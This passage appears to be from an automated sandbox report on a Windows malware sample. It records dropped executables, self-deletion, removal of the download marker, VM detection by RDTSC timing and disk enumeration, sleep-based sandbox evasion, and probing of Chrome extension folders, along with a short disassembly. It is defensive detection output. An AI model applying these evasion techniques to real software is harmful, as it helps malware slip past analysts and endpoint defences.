Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\AC25.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\tvvihsf	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\D711.exe	Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Uses known network protocols on non-standard ports

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 2080
Source: unknown	Network traffic detected: HTTP traffic on port 2080 -> 49720

Deletes itself after installation

Show sources

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\69cdtt1pad.exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Windows\explorer.exe

File opened: C:\Users\user\AppData\Roaming\tvvihsf:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\CA2F.exe

Code function: 31_2_004626E9 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

31_2_004626E9

Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AC25.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AC25.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AC25.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AC25.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AC25.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AC25.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AC25.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AC25.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AC25.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B483.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B483.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B483.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B483.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B483.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B483.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\AppData\Local\Temp\C481.exe

RDTSC instruction interceptor: First address: 00007FFF8EE91F0F second address: 00007FFF8EE91F90 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec eax 0x0000000a mov dword ptr [esp+28h], eax 0x0000000e dec eax 0x0000000f mov eax, dword ptr [esp+30h] 0x00000013 dec eax 0x00000014 mov ecx, dword ptr [esp+28h] 0x00000018 dec eax 0x00000019 sub ecx, eax 0x0000001b dec eax 0x0000001c mov eax, ecx 0x0000001e dec eax 0x0000001f add esp, 48h 0x00000022 ret 0x00000023 dec eax 0x00000024 mov dword ptr [00010326h], eax 0x0000002a mov dword ptr [esp+28h], 00000000h 0x00000032 jmp 00007F8184AC1CDCh 0x00000034 mov eax, dword ptr [esp+50h] 0x00000038 cmp dword ptr [esp+28h], eax 0x0000003c jnl 00007F8184AC1D14h 0x0000003e rdtsc

Checks if the current machine is a virtual machine (disk enumeration)

Show sources

Source: C:\Users\user\Desktop\69CDTt1pad.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\69CDTt1pad.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\69CDTt1pad.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\69CDTt1pad.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\69CDTt1pad.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\69CDTt1pad.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tvvihsf	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tvvihsf	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tvvihsf	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tvvihsf	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tvvihsf	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tvvihsf	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior

Source: C:\Windows\explorer.exe TID: 6324	Thread sleep count: 603 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6332	Thread sleep count: 236 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6328	Thread sleep count: 302 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6328	Thread sleep time: -30200s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6224	Thread sleep count: 292 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 1292	Thread sleep count: 166 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6228	Thread sleep count: 208 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 3036	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6612	Thread sleep time: -270000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe TID: 7072	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe TID: 7072	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe TID: 7100	Thread sleep count: 892 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe TID: 7132	Thread sleep count: 41 > 30	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\C481.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\C481.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\CA2F.exe

Code function: 31_2_0045F961 GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 0045FA8Ah

31_2_0045F961

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 603			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C481.exe	Window / User API: threadDelayed 892			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\CA2F.exe

Registry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\C481.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\CA2F.exe

Code function: 31_2_0040A5EA _strtok,_strtok,__wgetenv,__wgetenv,GetLogicalDriveStringsA,_strtok,GetDriveTypeA,_strtok,

31_2_0040A5EA

Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\

Source: explorer.exe, 00000005.00000000.287457067.0000000008A32000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000005.00000000.287457067.0000000008A32000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000005.00000000.278341267.0000000006949000.00000004.00000001.sdmp	Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000006.00000002.531647577.000001F8D7660000.00000004.00000001.sdmp	Binary or memory string: "@Hyper-V RAW
Source: explorer.exe, 00000005.00000000.287745779.0000000008B88000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.276955312.00000000059C0000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.527546354.00000281D6140000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000005.00000000.287745779.0000000008B88000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
Source: explorer.exe, 00000005.00000000.265763432.00000000048E0000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000013.00000002.376367497.0000020C472FA000.00000004.00000001.sdmp	Binary or memory string: @Hyper-V RAW
Source: explorer.exe, 00000005.00000000.257437669.0000000000EB8000.00000004.00000020.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}oft.Mic
Source: explorer.exe, 00000005.00000000.287587911.0000000008ACF000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
Source: explorer.exe, 00000005.00000000.287745779.0000000008B88000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
Source: svchost.exe, 00000006.00000002.512741633.000001F8D1E29000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.376263570.0000020C472A9000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000008.00000002.513927416.0000017716802000.00000004.00000001.sdmp	Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
Source: explorer.exe, 00000005.00000000.287587911.0000000008ACF000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000005.00000000.278341267.0000000006949000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD002
Source: explorer.exe, 00000005.00000000.276955312.00000000059C0000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.527546354.00000281D6140000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000005.00000000.276955312.00000000059C0000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.527546354.00000281D6140000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: svchost.exe, 00000008.00000002.515586291.0000017716829000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.512476728.00000281D543E000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.517023071.000001DD1B829000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: explorer.exe, 00000005.00000000.276955312.00000000059C0000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.527546354.00000281D6140000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\69CDTt1pad.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\CA2F.exe

Code function: 31_2_004323AD GetSystemInfo,

31_2_004323AD

Source: C:\Users\user\AppData\Local\Temp\B483.exe	Code function: 27_2_0043E07C FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,	27_2_0043E07C
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	Code function: 31_2_0040A24D __EH_prolog3,_sprintf,FindFirstFileA,_sprintf,_sprintf,_sprintf,PathMatchSpecA,CopyFileA,FindNextFileA,FindClose,	31_2_0040A24D
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	Code function: 31_2_004625F7 __EH_prolog3_GS,FindFirstFileW,FindNextFileW,	31_2_004625F7
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	Code function: 31_2_00412D96 _sprintf,FindFirstFileA,_sprintf,FindNextFileA,FindClose,	31_2_00412D96
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	Code function: 31_2_00404F13 __EH_prolog3,_memset,_memset,_memset,_memset,lstrcpyW,lstrcatW,FindFirstFileW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcmpW,lstrcmpW,lstrcmpW,PathMatchSpecW,DeleteFileW,PathMatchSpecW,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileW,FindClose,_memset,_memset,_memset,_memset,_memset,_memset,_memset,_memset,FindClose,	31_2_00404F13
Source: C:\Users\user\AppData\Local\Temp\CA2F.exe	Code function: 31_2_00405A45 __EH_prolog3,_sprintf,FindFirstFileA,_sprintf,FindNextFileA,FindClose,	31_2_00405A45

Source: C:\Users\user\Desktop\69CDTt1pad.exe

System information queried: ModuleInformation

Jump to behavior

Anti Debugging:

